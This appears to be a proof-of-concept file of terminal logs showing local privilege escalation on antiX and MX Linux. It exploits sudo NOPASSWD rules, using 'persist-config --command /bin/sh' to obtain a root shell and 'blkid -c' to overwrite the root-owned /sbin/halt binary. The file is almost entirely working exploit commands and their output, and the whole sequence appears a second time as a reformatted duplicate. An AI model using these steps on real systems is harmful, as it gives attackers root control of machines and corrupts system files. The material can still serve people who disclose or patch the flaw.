bash-c/AntiX-exp.sh

## AntiX-exp.sh
# OS version
m4x@antix1:~
$ cat /etc/issue
Welcome to antiX. Powered by Debian.
m4x@antix1:~
$ uname -a
Linux antix1 4.9.193-antix.1-amd64-smp #1 SMP PREEMPT Fri Sep 20 20:30:09 BST 2019 x86_64 GNU/Linux
m4x@antix1:~
$ lsb_release -a
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 10 (buster)
Release:	10
Codename:	buster

# exploit
m4x@antix1:~
$ id
uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),112(lpadmin),113(scanner),114(vboxsf)
m4x@antix1:~
$ sudo -l
Matching Defaults entries for m4x on antix1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    !requiretty, !tty_tickets

Runas and Command-specific defaults for m4x:
    Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME

User m4x may run the following commands on antix1:
    (ALL : ALL) ALL
    (root) NOPASSWD: /sbin/halt
    (root) NOPASSWD: /sbin/poweroff
    (root) NOPASSWD: /sbin/reboot
    (root) NOPASSWD: /sbin/blkid
    (root) NOPASSWD: /sbin/fdisk.distrib
    (root) NOPASSWD: /usr/bin/ceni
    (root) NOPASSWD: /usr/local/bin/persist-config      <==== bug here
    (root) NOPASSWD: /usr/local/bin/persist-save
    (root) NOPASSWD: /usr/sbin/minstall
    (root) NOPASSWD: /usr/local/bin/antixsources.sh
    (root) NOPASSWD: /usr/local/bin/connectshares.sh
    (root) NOPASSWD: /usr/local/bin/disconnectshares.sh
    (root) NOPASSWD: /bin/chvt
    (root) NOPASSWD: /usr/local/bin/menu_manager.sh
    (root) NOPASSWD: /usr/sbin/pm-hibernate
    (root) NOPASSWD: /usr/sbin/pm-suspend
    (root) NOPASSWD: /usr/local/bin/update-default-desktop
m4x@antix1:~
$ sudo /usr/local/bin/persist-config --command /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
#

## AntiX_MXLinux_Poc.sh
m4x@mx:~/Desktop
$ sudo -l
Matching Defaults entries for m4x on mx:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty,
    !tty_tickets

Runas and Command-specific defaults for m4x:
    Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME

User m4x may run the following commands on mx:
    (ALL : ALL) ALL
    (root) NOPASSWD: /sbin/halt
    (root) NOPASSWD: /sbin/poweroff
    (root) NOPASSWD: /sbin/reboot
    (root) NOPASSWD: /sbin/blkid
    (root) NOPASSWD: /sbin/fdisk.distrib
    (root) NOPASSWD: /usr/bin/ceni
    (root) NOPASSWD: /usr/local/bin/persist-config
    (root) NOPASSWD: /usr/local/bin/persist-save
    (root) NOPASSWD: /usr/sbin/minstall
    (root) NOPASSWD: /usr/local/bin/antixsources.sh
    (root) NOPASSWD: /usr/local/bin/connectshares.sh
    (root) NOPASSWD: /usr/local/bin/disconnectshares.sh
    (root) NOPASSWD: /bin/chvt
    (root) NOPASSWD: /usr/local/bin/menu_manager.sh
    (root) NOPASSWD: /usr/sbin/pm-hibernate
    (root) NOPASSWD: /usr/sbin/pm-suspend
    (root) NOPASSWD: /usr/local/bin/update-default-desktop
    (root) NOPASSWD: /usr/lib/mx-tweak/backlight-brightness
m4x@mx:~/Desktop
$ ls -l /sbin/halt
-rwxr-xr-x 1 root root 18888 Feb 14  2019 /sbin/halt
m4x@mx:~/Desktop
$ sudo /sbin/blkid -c /sbin/halt
/dev/sr0: UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660"
/dev/sda1: LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01"
/dev/sda2: LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02"
m4x@mx:~/Desktop
$ sudo cat /sbin/halt
<device DEVNO="0x0b00" TIME="1584329636.32005" UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660">/dev/sr0</device>
<device DEVNO="0x0801" TIME="1584329636.35739" LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01">/dev/sda1</device>
<device DEVNO="0x0802" TIME="1584329636.38616" LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02">/dev/sda2</device>


## MX-exp.sh
# OS version
m4x@M4x-PC:~
$ screenfetch
         _,met$$$$$gg.           m4x@M4x-PC
      ,g$$$$$$$$$$$$$$$P.        OS: Debian 10 buster
    ,g$$P""       """Y$$.".      Kernel: x86_64 Linux 4.19.0-6-amd64
   ,$$P'              `$$$.      Uptime: 25m
  ',$$P       ,ggs.     `$$b:    Packages: 1970
  `d$$'     ,$P"'   .    $$$     Shell: bash 5.0.3
   $$P      d$'     ,    $$P     Resolution: 3838x1819
   $$:      $$.   -    ,d$$'     DE: XFCE
   $$\;      Y$b._   _,d$P'      WM: Xfwm4
   Y$$.    `.`"Y$$$$P"'          WM Theme: Arc-Dark
   `$$b      "-.__               GTK Theme: Greybird-mx [GTK2]
    `Y$$                         Icon Theme: Papirus
     `Y$$.                       Font: Noto Sans 10.5
       `$$b.                     CPU: Intel Core i7-8650U @ 2.112GHz
         `Y$$b.                  GPU: llvmpipe (LLVM 7.0, 256 bits)
            `"Y$b._              RAM: 832MiB / 1970MiB
                `""""

m4x@M4x-PC:~
$ cat /etc/issue
Welcome to MX Linux! Powered by Debian.

# exploit
m4x@M4x-PC:~
$ id
uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),111(lpadmin),118(scanner),125(vboxsf)
m4x@M4x-PC:~
$ sudo -l
Matching Defaults entries for m4x on M4x-PC:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty,
    !tty_tickets

Runas and Command-specific defaults for m4x:
    Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME

User m4x may run the following commands on M4x-PC:
    (ALL : ALL) ALL
    (root) NOPASSWD: /sbin/halt
    (root) NOPASSWD: /sbin/poweroff
    (root) NOPASSWD: /sbin/reboot
    (root) NOPASSWD: /sbin/blkid
    (root) NOPASSWD: /sbin/fdisk.distrib
    (root) NOPASSWD: /usr/bin/ceni
    (root) NOPASSWD: /usr/local/bin/persist-config    <======= bug here
    (root) NOPASSWD: /usr/local/bin/persist-save
    (root) NOPASSWD: /usr/sbin/minstall
    (root) NOPASSWD: /usr/local/bin/antixsources.sh
    (root) NOPASSWD: /usr/local/bin/connectshares.sh
    (root) NOPASSWD: /usr/local/bin/disconnectshares.sh
    (root) NOPASSWD: /bin/chvt
    (root) NOPASSWD: /usr/local/bin/menu_manager.sh
    (root) NOPASSWD: /usr/sbin/pm-hibernate
    (root) NOPASSWD: /usr/sbin/pm-suspend
    (root) NOPASSWD: /usr/local/bin/update-default-desktop
m4x@M4x-PC:~
$ sudo /usr/local/bin/persist-config --command /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
#
	# OS version
	m4x@antix1:~
	$ cat /etc/issue
	Welcome to antiX. Powered by Debian.
	m4x@antix1:~
	$ uname -a
	Linux antix1 4.9.193-antix.1-amd64-smp #1 SMP PREEMPT Fri Sep 20 20:30:09 BST 2019 x86_64 GNU/Linux
	m4x@antix1:~
	$ lsb_release -a
	No LSB modules are available.
	Distributor ID: Debian
	Description: Debian GNU/Linux 10 (buster)
	Release: 10
	Codename: buster

	# exploit
	m4x@antix1:~
	$ id
	uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),112(lpadmin),113(scanner),114(vboxsf)
	m4x@antix1:~
	$ sudo -l
	Matching Defaults entries for m4x on antix1:
	env_reset, mail_badpass,
	secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
	!requiretty, !tty_tickets

	Runas and Command-specific defaults for m4x:
	Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME

	User m4x may run the following commands on antix1:
	(ALL : ALL) ALL
	(root) NOPASSWD: /sbin/halt
	(root) NOPASSWD: /sbin/poweroff
	(root) NOPASSWD: /sbin/reboot
	(root) NOPASSWD: /sbin/blkid
	(root) NOPASSWD: /sbin/fdisk.distrib
	(root) NOPASSWD: /usr/bin/ceni
	(root) NOPASSWD: /usr/local/bin/persist-config <==== bug here
	(root) NOPASSWD: /usr/local/bin/persist-save
	(root) NOPASSWD: /usr/sbin/minstall
	(root) NOPASSWD: /usr/local/bin/antixsources.sh
	(root) NOPASSWD: /usr/local/bin/connectshares.sh
	(root) NOPASSWD: /usr/local/bin/disconnectshares.sh
	(root) NOPASSWD: /bin/chvt
	(root) NOPASSWD: /usr/local/bin/menu_manager.sh
	(root) NOPASSWD: /usr/sbin/pm-hibernate
	(root) NOPASSWD: /usr/sbin/pm-suspend
	(root) NOPASSWD: /usr/local/bin/update-default-desktop
	m4x@antix1:~
	$ sudo /usr/local/bin/persist-config --command /bin/sh
	# id
	uid=0(root) gid=0(root) groups=0(root)
	#
	m4x@mx:~/Desktop
	$ sudo -l
	Matching Defaults entries for m4x on mx:
	env_reset, mail_badpass,
	secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty,
	!tty_tickets

	Runas and Command-specific defaults for m4x:
	Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME

	User m4x may run the following commands on mx:
	(ALL : ALL) ALL
	(root) NOPASSWD: /sbin/halt
	(root) NOPASSWD: /sbin/poweroff
	(root) NOPASSWD: /sbin/reboot
	(root) NOPASSWD: /sbin/blkid
	(root) NOPASSWD: /sbin/fdisk.distrib
	(root) NOPASSWD: /usr/bin/ceni
	(root) NOPASSWD: /usr/local/bin/persist-config
	(root) NOPASSWD: /usr/local/bin/persist-save
	(root) NOPASSWD: /usr/sbin/minstall
	(root) NOPASSWD: /usr/local/bin/antixsources.sh
	(root) NOPASSWD: /usr/local/bin/connectshares.sh
	(root) NOPASSWD: /usr/local/bin/disconnectshares.sh
	(root) NOPASSWD: /bin/chvt
	(root) NOPASSWD: /usr/local/bin/menu_manager.sh
	(root) NOPASSWD: /usr/sbin/pm-hibernate
	(root) NOPASSWD: /usr/sbin/pm-suspend
	(root) NOPASSWD: /usr/local/bin/update-default-desktop
	(root) NOPASSWD: /usr/lib/mx-tweak/backlight-brightness
	m4x@mx:~/Desktop
	$ ls -l /sbin/halt
	-rwxr-xr-x 1 root root 18888 Feb 14 2019 /sbin/halt
	m4x@mx:~/Desktop
	$ sudo /sbin/blkid -c /sbin/halt
	/dev/sr0: UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660"
	/dev/sda1: LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01"
	/dev/sda2: LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02"
	m4x@mx:~/Desktop
	$ sudo cat /sbin/halt
	<device DEVNO="0x0b00" TIME="1584329636.32005" UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660">/dev/sr0</device>
	<device DEVNO="0x0801" TIME="1584329636.35739" LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01">/dev/sda1</device>
	<device DEVNO="0x0802" TIME="1584329636.38616" LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02">/dev/sda2</device>
	# OS version
	m4x@M4x-PC:~
	$ screenfetch
	_,met$$$$$gg. m4x@M4x-PC
	,g$$$$$$$$$$$$$$$P. OS: Debian 10 buster
	,g$$P"" """Y$$.". Kernel: x86_64 Linux 4.19.0-6-amd64
	,$$P' `$$$. Uptime: 25m
	',$$P ,ggs. `$$b: Packages: 1970
	`d$$' ,$P"' . $$$ Shell: bash 5.0.3
	$$P d$' , $$P Resolution: 3838x1819
	$$: $$. - ,d$$' DE: XFCE
	$$\; Y$b._ _,d$P' WM: Xfwm4
	Y$$. `.`"Y$$$$P"' WM Theme: Arc-Dark
	`$$b "-.__ GTK Theme: Greybird-mx [GTK2]
	`Y$$ Icon Theme: Papirus
	`Y$$. Font: Noto Sans 10.5
	`$$b. CPU: Intel Core i7-8650U @ 2.112GHz
	`Y$$b. GPU: llvmpipe (LLVM 7.0, 256 bits)
	`"Y$b._ RAM: 832MiB / 1970MiB
	`""""

	m4x@M4x-PC:~
	$ cat /etc/issue
	Welcome to MX Linux! Powered by Debian.

	# exploit
	m4x@M4x-PC:~
	$ id
	uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),111(lpadmin),118(scanner),125(vboxsf)
	m4x@M4x-PC:~
	$ sudo -l
	Matching Defaults entries for m4x on M4x-PC:
	env_reset, mail_badpass,
	secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty,
	!tty_tickets

	Runas and Command-specific defaults for m4x:
	Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME

	User m4x may run the following commands on M4x-PC:
	(ALL : ALL) ALL
	(root) NOPASSWD: /sbin/halt
	(root) NOPASSWD: /sbin/poweroff
	(root) NOPASSWD: /sbin/reboot
	(root) NOPASSWD: /sbin/blkid
	(root) NOPASSWD: /sbin/fdisk.distrib
	(root) NOPASSWD: /usr/bin/ceni
	(root) NOPASSWD: /usr/local/bin/persist-config <======= bug here
	(root) NOPASSWD: /usr/local/bin/persist-save
	(root) NOPASSWD: /usr/sbin/minstall
	(root) NOPASSWD: /usr/local/bin/antixsources.sh
	(root) NOPASSWD: /usr/local/bin/connectshares.sh
	(root) NOPASSWD: /usr/local/bin/disconnectshares.sh
	(root) NOPASSWD: /bin/chvt
	(root) NOPASSWD: /usr/local/bin/menu_manager.sh
	(root) NOPASSWD: /usr/sbin/pm-hibernate
	(root) NOPASSWD: /usr/sbin/pm-suspend
	(root) NOPASSWD: /usr/local/bin/update-default-desktop
	m4x@M4x-PC:~
	$ sudo /usr/local/bin/persist-config --command /bin/sh
	# id
	uid=0(root) gid=0(root) groups=0(root)
	#